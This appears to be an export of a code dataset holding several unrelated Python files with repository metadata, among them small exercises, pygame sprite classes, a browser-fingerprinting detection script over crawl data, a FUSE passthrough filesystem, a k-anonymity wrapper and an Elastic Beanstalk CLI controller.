seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
def lukuLaskeminen(luvut):
    """Return the sum of all numbers in *luvut*.

    Replaces the manual accumulator loop with the built-in sum(),
    which handles the empty list (returns 0) identically.
    """
    return sum(luvut)
# Read integers from the user until 0 is entered, then print their sum.
# The `laskemaan != True` flag of the original is replaced by the
# idiomatic `while True` + `break`; behaviour is unchanged (0 is still
# appended to the list before the loop ends).
lista = []
while True:
    uusiLuku = int(input("Anna kokonaisluku: "))
    print("Listaan lisätty uusi luku, jos annoit 0 luvun lista lasketaan läpi.")
    lista.append(uusiLuku)
    if uusiLuku == 0:
        break
tulos = lukuLaskeminen(lista)
print(f"Listan lukujen summa on {tulos}")
| Xanp0/NoelS_Ohjelmisto1 | moduuli_06/teht4_ListaKokonaislukuja.py | teht4_ListaKokonaislukuja.py | py | 456 | python | fi | code | 0 | github-code | 13 |
37562347758 | # The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.
# Find the sum of all the primes below two million.
import math
def prime_finder(x):
    """Return (is_prime, x) for a positive integer x.

    Trial division up to sqrt(x).  1 is reported as not prime,
    2 as prime.  The second tuple element is always x itself.
    """
    if x == 1:
        return False, int(x)
    if x == 2:
        return True, int(x)
    for i in range(2, int(math.sqrt(x) + 1)):
        if x % i == 0:
            # The original had an unreachable `break` after this return;
            # it has been removed.
            return False, int(x)
    return True, int(x)
# Sum all primes below two million (Project Euler #10).
# The original called prime_finder(i) twice per number (once for the
# flag, once for the value); call it once and unpack instead.
total = 0
for i in range(1, 2000000):
    is_prime, value = prime_finder(i)
    if is_prime:
        total += value
print(total)
| mertsengil/Project_Euler_with_Python | Problem_10.py | Problem_10.py | py | 592 | python | en | code | 0 | github-code | 13 |
1114757556 | import pygame, random
from Globals import WINDOWWIDTH, WINDOWHEIGHT
class Sprite:
    """Base drawable object backed by a class-wide list of loaded images.

    `sprites` is shared by the class (and each subclass that calls
    set_sprites), so all instances of one subclass draw from the same
    image pool.
    """

    # Shared image pool; populated via set_sprites().
    sprites = []

    def __init__(self,
                 parent,
                 coordinates: tuple,
                 scale: float,
                 randscale: tuple,
                 ticker: int = 0,
                 sprite_n: int = 0,
                 random_sprite: bool = False
                 ):
        # Scaling: base scale, optionally jittered by a random percentage
        # drawn from the (low, high) range in `randscale`.
        self.scale = scale if scale else 1
        if randscale:
            self.scale *= random.randint(*randscale) / 100
            self.scale = round(self.scale, 2)
        if random_sprite:
            # Pick a random image index from the shared pool.
            sprite_n = random.randint(0, self.sprites_len()-1)
        # Pixel size of this instance after scaling.
        size = [dem * self.scale for dem in self.get_sprite(sprite_n).get_size()]
        self.parent = parent  # surface this sprite is blitted onto
        self.__rect = pygame.Rect(coordinates, size)
        self.sprite = pygame.transform.scale(self.get_sprite(sprite_n), size)
        # Countdown timer: get_ticker() reloads from base_value each cycle.
        self.base_value = ticker
        self.ticker = 0

    @property
    def rect(self):
        # Read-only access to the rect object (the Rect itself stays mutable).
        return self.__rect

    @classmethod
    def set_sprites(cls, dir: str, n=1):
        """Load n images from a template path.

        The character 5 positions from the end of `dir` (just before the
        4-char extension) is replaced by each index 0..n-1.
        """
        cls.sprites = [(pygame.image.load(f'{dir[:-5]}{i}{dir[-4:]}')) for i in range(n)]

    @classmethod
    def get_sprite(cls, n=0):
        """Return image number n from the shared pool."""
        return cls.sprites[n]

    @classmethod
    def resize_sprites(cls, x_y: tuple = (1, 1), scale=None):
        """Resize every pooled image, either by factor `scale` or to `x_y`."""
        for i in range(len(cls.sprites)):
            if scale:
                cls.sprites[i] = pygame.transform.scale(cls.sprites[i],
                                                        (cls.sprites[i].get_width()*scale,
                                                         cls.sprites[i].get_height()*scale))
            else:
                cls.sprites[i] = pygame.transform.scale(cls.sprites[i], x_y)

    @classmethod
    def sprites_len(cls):
        """Number of images currently in the shared pool."""
        return len(cls.sprites)

    def blit_sprite(self):
        """Draw the sprite; always reports False (i.e. 'keep me alive')."""
        self.parent.blit(self.sprite, self.rect)
        return False

    def get_ticker(self):
        """Count down; return True once per `base_value + 1` calls."""
        if self.ticker == 0:
            self.ticker = self.base_value
            return True
        self.ticker -= 1
        return False
class MovingSprite(Sprite):
    """Sprite with per-frame movement, optional random speed/position,
    off-screen spawning and off-screen detection."""

    def __init__(self,
                 parent,
                 coordinates: tuple = (0, 0),
                 scale: float = None,
                 randscale: tuple = None,
                 ticker: int = 0,
                 sprite_n: int = 0,
                 random_sprite: bool = False,
                 speed_y: float = 0,
                 speed_x: float = 0,
                 random_speed: list = None,
                 outher: str = '',
                 random_pos: str = '',
                 cyclic_move: bool = False
                 ):
        super().__init__(parent, coordinates, scale, randscale, ticker, sprite_n, random_sprite)
        self.speed_y = speed_y
        self.speed_x = speed_x
        # When True, move_sprite never reports the sprite as off-screen.
        self.cyclic_move = cyclic_move
        if random_speed: self.__random_speed(random_speed)
        if outher: self.__outher(outher)
        if random_pos: self.__random_pos(random_pos)

    def __random_speed(self, random_speed):
        # random_speed = (axes string containing 'x'/'y', (low, high) range).
        if 'x' in random_speed[0]:
            self.speed_x = random.randint(*random_speed[1])
        if 'y' in random_speed[0]:
            self.speed_y = random.randint(*random_speed[1])

    def __outher(self, outher):
        # Place the sprite just outside the window on the given compass
        # side(s): n=above, s=below, w=left, e=right.
        if 'n' in outher:
            self.rect.bottom = 0
        if 's' in outher:
            self.rect.top = WINDOWHEIGHT
        if 'w' in outher:
            self.rect.right = 0
        if 'e' in outher:
            self.rect.left = WINDOWWIDTH

    def __random_pos(self, random_pos):
        # Randomize position along the requested axis/axes; the range lets
        # the sprite hang half-off either window edge.
        if 'x' in random_pos:
            self.rect.left = random.randint(-int(self.rect.width) // 2, WINDOWWIDTH - int(self.rect.width) // 2)
        if 'y' in random_pos:
            self.rect.top = random.randint(-int(self.rect.height) // 2, WINDOWHEIGHT - int(self.rect.height) // 2)

    @property
    def speed(self):
        """Current (speed_x, speed_y) velocity tuple."""
        return self.speed_x, self.speed_y

    def move_sprite(self, move=None):
        """Advance by `move` (or the stored speed).

        Returns True when the sprite left the window entirely and
        cyclic_move is off — callers use this to despawn it.
        """
        if move:
            self.rect.move_ip(*move)
        else:
            self.rect.move_ip(*self.speed)
        if not self.cyclic_move:
            if self.rect.bottom < 0 or \
                    self.rect.top > WINDOWHEIGHT or \
                    self.rect.right < 0 or \
                    self.rect.left > WINDOWWIDTH:
                return True
        return False
class AnimatedSprite(Sprite):
    """Sprite that plays the shared sprite list as an animation.

    `frame`/`start_frame` index into the class sprite pool; `cyclic`
    makes the animation wrap around, `sfx` marks one-shot effects whose
    completion is reported back to the caller via blit_sprite().
    """

    def __init__(self,
                 parent,
                 coordinates: tuple = (0, 0),
                 scale: float = None,
                 randscale: tuple = None,
                 ticker: int = 0,
                 sprite_n: int = 0,
                 random_sprite: bool = False,
                 frame: int = 0,
                 start_frame: int = 0,
                 cyclic: bool = False,
                 trigger: bool = True,
                 sfx: bool = False
                 ):
        if start_frame:
            # A non-zero start_frame also selects the initial image.
            sprite_n = start_frame
            frame = start_frame
        super().__init__(parent, coordinates, scale, randscale, ticker, sprite_n, random_sprite)
        self.frame = frame
        self.start_frame = start_frame
        self.cyclic = cyclic
        self.trigger = trigger
        self.sfx = sfx

    def get_frame(self):
        """Load the current frame image, rescaling it if needed."""
        self.sprite = (self.get_sprite(self.frame))
        if self.scale != 1:
            self.sprite = pygame.transform.scale(self.sprite,
                                                 (self.sprite.get_width() * self.scale,
                                                  self.sprite.get_height() * self.scale))

    def next_frame(self):
        """Advance one frame; return True when a one-shot sfx finished."""
        if self.frame + 1 < self.sprites_len():
            self.frame += 1
        elif self.cyclic:
            self.frame = self.start_frame
        elif not self.sfx:
            return False
        else:
            return True
        self.get_frame()
        return False

    def prev_frame(self):
        """Step one frame back; return True when a one-shot sfx finished."""
        if self.frame - 1 >= 0:
            self.frame -= 1
        elif self.cyclic:
            # BUGFIX: wrap to the LAST valid index.  The original set
            # self.frame = self.sprites_len(), which is out of range and
            # raised IndexError inside get_frame().
            self.frame = self.sprites_len() - 1
        elif not self.sfx:
            return False
        else:
            return True
        self.get_frame()
        return False

    def blit_sprite(self):
        """Draw the sprite, advancing the animation on each ticker expiry.

        Returns True when a one-shot sfx animation has ended (so the
        caller can drop the sprite), False otherwise.
        """
        if self.get_ticker():
            if self.cyclic or self.sfx:
                if self.next_frame():
                    return True
        self.parent.blit(self.sprite, self.rect)
        return False
class StickerMixin:
    """Mixin that glues a sprite's rect to a point on an owner sprite."""

    def init_sticker(self, owner: Sprite, point):
        """Remember the owner's rect and which of its anchor points to track."""
        self.owner = owner.rect
        self.owner_point = point

    def move_sprite(self):
        """Snap our rect's center onto the tracked anchor of the owner.

        Only 'center' and 'midtop' are recognised; any other value of
        owner_point leaves the rect where it is.
        """
        if self.owner_point in ('center', 'midtop'):
            self.rect.center = getattr(self.owner, self.owner_point)
class CollisionMixin:
    """Mixin providing rect-based collision helpers."""

    def collision_object(self, obj):
        """Return the result of a rect-vs-rect collision test with obj."""
        return self.rect.colliderect(obj.rect)

    def collision_check(self, obj_list):
        """Return the first object in obj_list whose rect we collide with.

        Returns None when nothing collides.
        """
        return next(
            (candidate for candidate in obj_list
             if self.rect.colliderect(candidate.rect)),
            None,
        )
class SoundMixin:
    """Mixin that loads and plays a class-wide list of sound effects."""

    # Shared sound pool; populated via set_sound().
    sounds = []

    @classmethod
    def set_sound(cls, dir: str, n=1):
        """Load n sounds from a template path.

        The character 5 positions from the end of `dir` (just before the
        4-char extension) is replaced by each index 0..n-1.
        """
        prefix, suffix = dir[:-5], dir[-4:]
        cls.sounds = [pygame.mixer.Sound(f'{prefix}{i}{suffix}') for i in range(n)]

    @classmethod
    def get_sound(cls, n=0):
        """Return sound number n from the shared pool."""
        return cls.sounds[n]

    def play_sound(self, n=0):
        """Play sound number n from the shared pool."""
        self.get_sound(n).play()
class HPMixin:
    """Mixin that gives a sprite hit points and damage handling.

    When no explicit hp is given, falls back to self.scale — assumes the
    host class (a Sprite) has already set `scale`.
    """

    def init_hp(self, hp=None):
        """Set hit points; default to the sprite's scale when hp is None.

        Checks `hp is not None` rather than truthiness so an explicit
        hp=0 is honoured instead of silently falling back to self.scale
        (the original `if hp:` dropped a zero value).
        """
        self.hp = hp if hp is not None else self.scale

    def get_hit(self, damage=1):
        """Apply `damage`; return True when the sprite is dead (hp <= 0)."""
        self.hp -= damage
        return self.hp <= 0
# This module is a library of sprite building blocks; nothing runs
# when it is executed directly.
if __name__ == '__main__':
    pass
| TheoDaizer/Fiy_me_to_the_Moon | BaseObjects.py | BaseObjects.py | py | 7,702 | python | en | code | 0 | github-code | 13 |
import sqlite3 as lite

# Connect to the SQLite database that OpenWPM produces as crawl output.
wpm_db = "crawl-data.sqlite"
conn = lite.connect(wpm_db)
cur = conn.cursor()

# Symbols used to check the fingerprinting conditions for informative
# JS objects (navigator/screen properties commonly read by trackers).
info_ob= ["window.navigator.appCodeName", "window.navigator.appName", "window.navigator.appVersion", "window.navigator.buildID", "window.navigator.cookieEnabled", "window.navigator.doNotTrack", "window.navigator.geolocation", "window.navigator.language", "window.navigator.languages", "window.navigator.onLine", "window.navigator.oscpu", "window.navigator.platform", "window.navigator.product", "window.navigator.productSub", "window.navigator.userAgent", "window.navigator.vendorSub", "window.navigator.vendor", "window.screen.pixelDepth", "window.screen.colorDepth"]
navplug= "window.navigator.plugins"
navmim= "window.navigator.mimeTypes"
ver_info_1 = set()      # (script_url + symbol) strings for plugins/mimeTypes accesses
ver_info_2 = set()      # (script_url + symbol) strings for info_ob accesses
info_sites_1 = set()    # "site script" pairs flagged by condition 1
info_sites_2 = set()    # "site script" pairs flagged by condition 2
info_sites = set()

# Scan the crawl records, flagging sites/scripts where the two
# informative-JS fingerprinting conditions hold.
# NOTE(review): the `sum(... in s for s in set)` expressions count how
# many stored entries CONTAIN the substring, not exact matches, and the
# sets deduplicate — presumably the thresholds (>5, >3, >15) were tuned
# for that; confirm before changing.
for url, symbol, op, val, arg, top_url in cur.execute("SELECT distinct j.script_url, j.symbol, j.operation, j.value, j.arguments, v.site_url FROM javascript as j JOIN site_visits as v ON j.visit_id = v.visit_id WHERE j.symbol LIKE '%window%' ORDER BY v.site_url;"):
    if navplug in symbol:
        ver_info_1.add(url + symbol)
        # Condition 1a: more than 5 distinct plugin-related accesses.
        if (sum((url + symbol) in s for s in ver_info_1)) > 5:
            info_sites_1.add(top_url + ' ' + url)
    elif navmim in symbol:
        ver_info_1.add(url + symbol)
        # Condition 1b: more than 3 distinct mimeType-related accesses.
        if (sum((url + symbol) in s for s in ver_info_1)) > 3:
            info_sites_1.add(top_url + ' ' + url)
    if symbol in info_ob:
        ver_info_2.add(url + symbol)
        # Condition 2: the same script reads more than 15 informative objects.
        if (sum((url) in s for s in ver_info_2)) > 15:
            info_sites_2.add(top_url + ' ' + url)

# Union of the sites satisfying either informative-JS fingerprinting
# condition.
info_sites = info_sites_1 | info_sites_2

# Show the results.
#print(1, info_sites_1)
#print("\n".join(info_sites_2))
print("\n".join(info_sites))
| jdanml/Web-Fingerprinting-Detection-Tool | Scripts/script_informativeJS_RC_v3.py | script_informativeJS_RC_v3.py | py | 2,156 | python | en | code | 0 | github-code | 13 |
21104602164 | from django.conf.urls import patterns, include, url
from django.conf import settings
from django.contrib import admin
admin.autodiscover()

# Legacy Django URLconf (pre-1.8 `patterns()` style): admin, allauth
# account routes, i18n language switching, and the project's common app
# as catch-all.
urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),

    # Sessions (django-allauth login/logout/signup routes)
    url(r'^accounts/', include('allauth.urls')),

    # i18n: language-switching view
    (r'^i18n/', include('django.conf.urls.i18n')),

    url(r'^', include('common.urls')),
)
| AryGit/arytest | arytest/urls.py | urls.py | py | 399 | python | en | code | 0 | github-code | 13 |
70234340497 | """
This script is a leet speak convertissor.
It takes a string and it returns the string written in leet speak.
"""
def permutation(letter):
    """Return the leet-speak digit for a lowercase letter.

    Letters without an explicit entry map to "2" — in practice that
    only ever applies to "z", the one remaining letter the caller
    passes in.
    """
    leet_table = {
        "a": "4",
        "b": "8",
        "e": "3",
        "l": "1",
        "o": "0",
        "g": "6",
        "s": "5",
        "t": "7",
    }
    return leet_table.get(letter, "2")
def convertissor(text):
    """Convert a string to leet speak.

    Case-insensitive: "A" and "a" both become "4".  Characters without
    a leet equivalent pass through unchanged.  The mapping previously
    delegated to permutation() is inlined here.
    """
    leet_table = {"a": "4", "b": "8", "e": "3", "g": "6", "l": "1",
                  "o": "0", "s": "5", "t": "7", "z": "2"}
    return "".join(leet_table.get(char.lower(), char) for char in text)
# Interactive entry point: read a line and echo its leet-speak version.
message = input("""Enter text to convert : """)
leet_speak_message = convertissor(message)
print(leet_speak_message)
| AlexBardDev/Funny_Python | leet_speak_convertissor.py | leet_speak_convertissor.py | py | 1,188 | python | en | code | 0 | github-code | 13 |
70436968979 | ## Website:: Interviewbit
## Link:: https://www.interviewbit.com/problems/redundant-braces/
## Topic:: Stacks
## Sub-topic:: Simple
## Difficulty:: Medium
## Approach::
## Time complexity:: O(N)
## Space complexity:: O(N)
## Notes::
class Solution:
    """Detect redundant braces in an arithmetic expression string."""

    # @param A : string
    # @return an integer
    def braces(self, A):
        """Return 1 if A contains a redundant pair of parentheses, else 0.

        A '(' ... ')' pair is redundant when fewer than two tokens sit
        between them — i.e. the pair wraps nothing or a single operand.
        Assumes balanced input; an unmatched ')' raises IndexError.
        """
        if not A:
            return 0
        stack = []
        for ch in A:
            if ch != ')':
                stack.append(ch)
                continue
            # Pop everything back to the matching '(' and count it.
            inner_count = 0
            while stack and stack[-1] != '(':
                stack.pop()
                inner_count += 1
            if inner_count < 2:
                return 1
            # Discard the matching '(' itself.
            stack.pop()
        return 0
| anujkhare/algorithms | solutions/Stacks and queues/RedundantBraces.py | RedundantBraces.py | py | 836 | python | en | code | 1 | github-code | 13 |
5174083226 |
from __future__ import with_statement
import argparse
from functools import wraps
import os
import sys
import errno
import logging
from fuse import FUSE, FuseOSError, Operations
import inspect
log = logging.getLogger(__name__)
def logged(f):
    """Decorator that logs each call as `name(arg1,arg2,...)` at INFO level.

    The first positional argument (self) is omitted from the log line.
    """
    @wraps(f)
    def wrapper(*args, **kwargs):
        arg_repr = ','.join(str(item) for item in args[1:])
        log.info('%s(%s)', f.__name__, arg_repr)
        return f(*args, **kwargs)
    return wrapper
# Path to the file you want to return regardless of the requested filename
# NOTE(review): not referenced anywhere else in this file — appears to be
# left over from an earlier experiment that match_tag() superseded.
target_file_path = "/home/user/lmao.txt"

# regex for getting everything between """
# regex = re.compile(r'"""(.*?)"""', re.DOTALL)
class Passthrough(Operations):
    """A simple passthrough interface.

    Initialize the filesystem. This function can often be left unimplemented, but
    it can be a handy way to perform one-time setup such as allocating
    variable-sized data structures or initializing a new filesystem. The
    fuse_conn_info structure gives information about what features are supported
    by FUSE, and can be used to request certain capabilities (see below for more
    information). The return value of this function is available to all file
    operations in the private_data field of fuse_context. It is also passed as a
    parameter to the destroy() method.
    """

    def __init__(self, source):
        # Root directory on the real filesystem that backs the mount.
        self.source = source

    def destroy(self, path):
        """Clean up any resources used by the filesystem.

        Called when the filesystem exits.
        """
        pass

    def _full_path(self, partial):
        """Calculate full path for the mounted file system.

        .. note::

            This isn't the same as the full path for the underlying file system.
            As such, you can't use os.path.abspath to calculate this, as that
            won't be relative to the mount point root.
        """
        if partial.startswith("/"):
            partial = partial[1:]
        path = os.path.join(self.source, partial)
        return path

    @logged
    def access(self, path, mode):
        """Access a file.

        This is the same as the access(2) system call. It returns -ENOENT if
        the path doesn't exist, -EACCESS if the requested permission isn't
        available, or 0 for success. Note that it can be called on files,
        directories, or any other object that appears in the filesystem. This
        call is not required but is highly recommended.
        """
        # (Docstring moved above the code; it previously sat after the
        # print call and so was never attached as documentation.)
        print("#### access", path, mode)
        full_path = self._full_path(path)
        if not os.access(full_path, mode):
            raise FuseOSError(errno.EACCES)

    @logged
    def get_lstat_for_path(self, path):
        """Return the stat fields FUSE expects for *path* as a plain dict."""
        full_path = self._full_path(path)
        st = os.lstat(full_path)
        return dict((key, getattr(st, key)) for key in ('st_atime', 'st_ctime',
                    'st_gid', 'st_mode', 'st_mtime', 'st_nlink', 'st_size', 'st_uid'))

    @logged
    def match_tag(self, path):
        """Resolve an 'art:' tag query to a real filename in self.source.

        A path like '/art:cat,red' is matched against the directory
        listing; every tag must appear in the filename.  Because the loop
        has no break, the LAST matching file wins.  Paths without 'art:'
        are returned unchanged.
        """
        # this is a router that will search for a file that has the tag in its name, and will return the file that most closely matches the tag
        if ("art:" in path):
            print("art: found")
            # try to split by , and if it fails, then take anything after the comma
            # NOTE(review): bare except — and the fallback repeats the same
            # indexing that just failed, so a path containing "art:" but not
            # "/art:" would raise IndexError here; TODO narrow/verify.
            try:
                tags = path.split("/art:")[1].split(",")
            except:
                tags = [path.split("/art:")[1]]
            print("tags:", tags)
            possible_files = os.listdir(self.source)
            for file in possible_files:
                if all(tag in file for tag in tags):
                    path = file
        return path

    @logged
    def getattr(self, path, fh=None):
        """Return file attributes.

        The "stat" structure is described in detail in the stat(2) manual page.
        For the given pathname, this should fill in the elements of the "stat"
        structure. If a field is meaningless or semi-meaningless (e.g., st_ino)
        then it should be set to 0 or given a "reasonable" value. This call is
        pretty much required for a usable filesystem.

        (Docstring moved to the top of the method; it previously appeared
        after the return statement and was unreachable.)
        """
        print("#### getattr", path, fh)
        # if you just look in the directory, its fine
        # if you get something that starts with degruchy_, then check what the rest of the filename is
        # if the filename contains a , then we need to look and see if any images in the directory contain a _
        # if they do, then we need to split the filename by , and split the directory listing by _
        # then do a match between each of the split parts and the images in the directory
        # we then return whichever matches most closely
        path = self.match_tag(path)
        return self.get_lstat_for_path(path)

    @logged
    def readdir(self, path, fh):
        """Read a directory.

        Return one or more directory entries (struct dirent) to the caller.
        This is one of the most complex FUSE functions. It is related to, but
        not identical to, the readdir(2) and getdents(2) system calls, and the
        readdir(3) library function. Because of its complexity, it is described
        separately below. Required for essentially any filesystem, since it's
        what makes ls and a whole bunch of other things work.
        """
        print("#### readdir", path, fh)
        full_path = self._full_path(path)
        dirents = ['.', '..']
        if os.path.isdir(full_path):
            dirents.extend(os.listdir(full_path))
        for r in dirents:
            yield r

    @logged
    def statfs(self, path):
        """Return filesystem statistics (statvfs fields) as a plain dict."""
        print("#### statfs", path)
        full_path = self._full_path(path)
        stv = os.statvfs(full_path)
        return dict((key, getattr(stv, key)) for key in ('f_bavail', 'f_bfree',
                    'f_blocks', 'f_bsize', 'f_favail', 'f_ffree', 'f_files', 'f_flag',
                    'f_frsize', 'f_namemax'))

    @logged
    def open(self, path, flags):
        """Open a file.

        Open a file. If you aren't using file handles, this function should
        just check for existence and permissions and return either success or
        an error code. If you use file handles, you should also allocate any
        necessary structures and set fi->fh. In addition, fi has some other
        fields that an advanced filesystem might find useful; see the structure
        definition in fuse_common.h for very brief commentary.
        """
        print("#### open", path, flags)
        # Tag queries are resolved to real filenames before opening.
        path = self.match_tag(path)
        full_path = self._full_path(path)
        return os.open(full_path, flags)

    @logged
    def read(self, path, length, offset, fh):
        """Read from a file.

        Read size bytes from the given file into the buffer buf, beginning
        offset bytes into the file. See read(2) for full details. Returns the
        number of bytes transferred, or 0 if offset was at or beyond the end of
        the file. Required for any sensible filesystem.
        """
        print("#### read", path, length, offset, fh)
        os.lseek(fh, offset, os.SEEK_SET)
        return os.read(fh, length)

    @logged
    def flush(self, path, fh):
        """Flush buffered information.

        Called on each close so that the filesystem has a chance to report
        delayed errors. Important: there may be more than one flush call for
        each open. Note: There is no guarantee that flush will ever be called
        at all!
        """
        print("#### flush", path, fh)
        return os.fsync(fh)

    @logged
    def release(self, path, fh):
        """Release is called when FUSE is done with a file.

        This is the only FUSE function that doesn't have a directly
        corresponding system call, although close(2) is related. Release is
        called when FUSE is completely done with a file; at that point, you can
        free up any temporarily allocated data structures. The IBM document
        claims that there is exactly one release per open, but I don't know if
        that is true.
        """
        print("#### release", path, fh)
        return os.close(fh)
if __name__ == '__main__':
    # CLI: optional positional mountpoint and source, with defaults so
    # the script can be launched bare for a quick demo.
    # add arguments as optional, with a default
    parser = argparse.ArgumentParser()
    parser.add_argument("mountpoint", help="the mountpoint where the files will be available",
                        default='mountpoint/', nargs='?')
    # optional argument
    parser.add_argument("source", help="the source directory where the files will be taken from",
                        default='source_folder/', nargs='?')
    args = parser.parse_args()
    print("starting")
    print("mountpoint", args.mountpoint)
    print("source", args.source)
    # foreground=True keeps FUSE in this process until unmounted.
    FUSE(Passthrough(source=args.source),
         args.mountpoint, foreground=True)
| claydegruchy/vtt-image-tag | custom_fs.py | custom_fs.py | py | 8,907 | python | en | code | 0 | github-code | 13 |
3454987611 | from datetime import datetime
import pandas as pd
from privacy.base import suppress_only
from privacy.bayardo import BayardoAnonymizer
class BayardoExtendedAnonymizer:
    """
    Optimal k-Anonymity [Bayardo et al.] to generate fairness.

    Partitions the DataFrame by `grouping_keys` (when given) and runs one
    BayardoAnonymizer per partition; with suppression-only configuration
    the whole frame is handled by util.suppress_only instead.
    """

    def __init__(self, df, quasi_identifier, grouping_keys, use_suppression, use_generalization):
        """
        :param df: input pandas DataFrame
        :param quasi_identifier: QI for the anonymization (Bayardo)
        :param grouping_keys: Grouping for each anonymizer (can be empty)
        :param use_suppression: allow tuple suppression
        :param use_generalization: allow value generalization
        """
        # Small integrity checks
        if set(quasi_identifier).intersection(grouping_keys):
            raise ValueError("QI and grouping key must be disjoint.")

        # Save parameters (sorted for deterministic column ordering)
        self.df = df
        self.quasi_identifier = sorted(quasi_identifier)
        self.grouping_keys = sorted(grouping_keys)
        self.use_suppression = use_suppression
        self.use_generalization = use_generalization
        self.suppression_qi = self.quasi_identifier + self.grouping_keys

        # Prepare
        self.size = len(df.index)
        self.duration = None  # wall-clock time of the last run()
        if self.grouping_keys:
            groups = self.df.groupby(self.grouping_keys).groups
            self._df_groups = [self.df.iloc[g_idx] for _, g_idx in groups.items()]
        else:
            self._df_groups = [self.df]

        # State: one anonymizer per partition
        self._anonymizers = [
            BayardoAnonymizer(df_slice, self.quasi_identifier, use_suppression=use_suppression) for df_slice in
            self._df_groups]

        # Print INFO
        print("INFO: Initialized {} groups".format(len(self._df_groups)))
        print("INFO: k_max = {}".format(self.k_max))
        if use_generalization:
            print("INFO: Using generalization")
        if use_suppression:
            print("INFO: Using suppression")
        for idx, a in enumerate(self._anonymizers):
            print("DEBUG: Anonymizer {}: {} tuples, {} domain values".format(idx + 1, a.size, len(a.dom_values)))

    @property
    def _suppression_only(self):
        # True when suppression is the only permitted operation.
        return self.use_suppression and not self.use_generalization

    @property
    def k_max(self):
        """Largest feasible k for the configured operation mode."""
        if self.grouping_keys and self.use_generalization:
            # Bounded by the smallest partition size.
            return int(self.df.groupby(self.grouping_keys).count().min().min())
        elif self._suppression_only:
            # Bounded by the largest equivalence class on the QI.
            return int(self.df.groupby(self.suppression_qi).count().max().min())
        else:
            return int(self.size)

    @property
    def best_cost(self):
        """Summed anonymization cost; -1 when suppression-only (no cost model)."""
        if self._suppression_only:
            return -1
        else:
            return sum(a.best_cost for a in self._anonymizers)

    def generate_output(self):
        """Concatenate the anonymized partitions back into one DataFrame."""
        frames = [a.anonymized_df for a in self._anonymizers]
        return pd.concat(frames)

    def run(self, k):
        """Anonymize for the given k and return the resulting DataFrame."""
        # Integrity checks
        if not 1 <= k <= self.k_max:
            raise ValueError("k must be from [1, {}]".format(self.k_max))

        start = datetime.now()
        if self._suppression_only:
            print("INFO: Anonymizing ... ", end="", flush=True)
            df = suppress_only(self.df, k, self.suppression_qi)
            print("done", flush=True)
            self.duration = datetime.now() - start
        else:
            # Run each partition's anonymizer, reporting progress in-place.
            print("INFO: Anonymizing ... {:.2%}".format(0), end="", flush=True)
            for idx, anonymizer in enumerate(self._anonymizers):
                anonymizer.run(k)
                print("\rINFO: Anonymizing ... {:.2%}".format((idx + 1.0) / len(self._anonymizers)), end="", flush=True)
            print("")
            self.duration = datetime.now() - start
            df = self.generate_output()
        print("INFO: Finished in {}".format(self.duration))
        return df
| johnruth96/privacy-justifiable-fairness | privacy/bayardoext.py | bayardoext.py | py | 3,771 | python | en | code | 0 | github-code | 13 |
37313915498 | from django.urls import path
from users.views import (
DepositView,
UserCreateView,
UserDetailView,
UserLoginView,
UserLogoutView
)
# User account routes: session login/logout, registration, user detail
# and balance deposit.
urlpatterns = [
    path('login', UserLoginView.as_view(), name='login'),
    path('logout', UserLogoutView.as_view(), name='logout'),
    path('register', UserCreateView.as_view(), name='user_create'),
    path('<int:pk>', UserDetailView.as_view(), name='user_detail'),
    path('<int:pk>/deposit', DepositView.as_view(), name='deposit'),
]
| coldwhiskeyman/fry_shop | users/urls.py | urls.py | py | 497 | python | en | code | 0 | github-code | 13 |
13514006086 | from ebcli.core import fileoperations, io
from ebcli.core.abstractcontroller import AbstractBaseController
from ebcli.operations import platformops, platform_version_ops
from ebcli.resources.strings import strings, flag_text, prompts
class GenericPlatformDeleteController(AbstractBaseController):
    """Shared implementation behind `eb platform delete` and `ebp delete`.

    Deletes a single custom platform version, or — with --cleanup — all
    versions in 'Failed' status.
    """

    class Meta:
        is_platform_workspace_only_command = True
        requires_directory_initialization = True
        description = strings['platformdeleteversion.info']
        arguments = [
            (
                ['version'],
                dict(
                    action='store',
                    help=flag_text['platformdeleteversion.version'],
                    nargs='?',
                    default=None
                )
            ),
            (
                ['--cleanup'],
                dict(
                    action='store_true',
                    help=flag_text['platformdelete.cleanup']
                )
            ),
            (
                ['--all-platforms'],
                dict(
                    action='store_true',
                    help=flag_text['platformdelete.allplatforms']
                )
            ),
            (
                ['--force'],
                dict(
                    action='store_true',
                    help=flag_text['platformdelete.force']
                )
            )
        ]
        epilog = strings['platformdeleteversion.epilog']

    @classmethod
    def clone(cls):
        # Produce an independent copy of the Meta class so subclasses can
        # override attributes without mutating the shared original.
        return type('Meta', cls.__bases__, dict(cls.__dict__))

    def do_command(self):
        """Dispatch: --cleanup wins, then an explicit version, else help."""
        version = self.app.pargs.version
        cleanup = self.app.pargs.cleanup
        force = self.app.pargs.force

        if cleanup:
            self.cleanup_platforms()
        else:
            if version:
                platform_version_ops.delete_platform_version(version, force)
            else:
                self.app.args.print_help()

    def cleanup_platforms(self):
        """Delete all 'Failed' platform versions.

        Scope is the workspace's platform unless --all-platforms is set;
        without --force the user must confirm interactively first.
        """
        force = self.app.pargs.force
        all_platforms = self.app.pargs.all_platforms

        if all_platforms:
            platform_name = None  # None means: every platform
        else:
            platform_name = fileoperations.get_platform_name()

        failed_versions = sorted(
            platform_version_ops.list_custom_platform_versions(
                platform_name=platform_name,
                status='Failed',
            )
        )
        if failed_versions:
            if not force:
                if not platform_name:
                    # All-platforms mode: list what will be removed first.
                    io.echo(prompts['cleanupplatform.confirm'].replace('{platform-name}', 'All Platforms'))
                    for failed_version in failed_versions:
                        io.echo(failed_version)
                    io.validate_action(prompts['cleanupplatform.validate-all'], 'all')
                else:
                    io.echo(prompts['cleanupplatform.confirm'].replace('{platform-name}', platform_name))
                    io.validate_action(prompts['cleanupplatform.validate'], platform_name)

            for failed_version in failed_versions:
                platform_version_ops.delete_platform_version(failed_version, force=True)
class PlatformDeleteController(GenericPlatformDeleteController):
    # `eb platform delete` variant: same behaviour, registered as a
    # nested alias under the `platform` command.
    Meta = GenericPlatformDeleteController.Meta.clone()
